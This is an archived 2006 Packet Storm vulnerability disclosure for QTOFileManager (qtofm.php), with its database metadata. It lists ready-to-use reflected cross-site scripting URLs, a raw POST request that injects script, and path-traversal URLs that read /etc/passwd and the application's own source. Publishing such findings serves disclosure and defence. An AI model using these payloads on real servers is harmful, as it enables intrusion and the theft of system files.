ID PACKETSTORM:48039
Type packetstorm
Reporter ellsec.org
Modified 2006-07-09T00:00:00
Description
`--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1
http://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%
3E
http://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1
http://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
---
POST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 117
u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1
--------
http://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext=
http://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext=
-----------------
Ellipsis Security
http://ellsec.org
`
{"hash": "d5ccc56166720a3cec7341b31042f29f9a53a0918d442a81774ffc85f1e155ca", "sourceHref": "https://packetstormsecurity.com/files/download/48039/QTOFileManager.txt", "title": "QTOFileManager.txt", "id": "PACKETSTORM:48039", "published": "2006-07-09T00:00:00", "description": "", "modified": "2006-07-09T00:00:00", "sourceData": "`-------------------------- \nCross Site Scripting (XSS) \n-------------------------- \nhttp://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1 \nhttp://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script% \n \n3E \nhttp://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1 \nhttp://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E \n--- \nPOST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0 \nAccept: */* \nContent-Type: application/x-www-form-urlencoded \nHost: target.xx \nContent-Length: 117 \nu=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1 \n-------- \nhttp://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext= \nhttp://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext= \n----------------- \nEllipsis Security \nhttp://ellsec.org \n`\n", "reporter": "ellsec.org", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "2c70549dc1b3820ea6d4ead9e37e5562"}, {"key": "modified", "hash": "506c9e24ae2ddea054e86dc4fd6d6f07"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "506c9e24ae2ddea054e86dc4fd6d6f07"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "613a5a072d752f376bb723566d3bb672"}, {"key": "sourceData", "hash": "8003b7a104530258eb6d6a23bac521f4"}, {"key": "sourceHref", "hash": "b1ee8e8b6f258857f65b572e46488b3f"}, {"key": "title", "hash": "16e0dd622b3de71d7524939d198edb94"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/48039/QTOFileManager.txt.html", "lastseen": "2016-11-03T10:21:49", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}
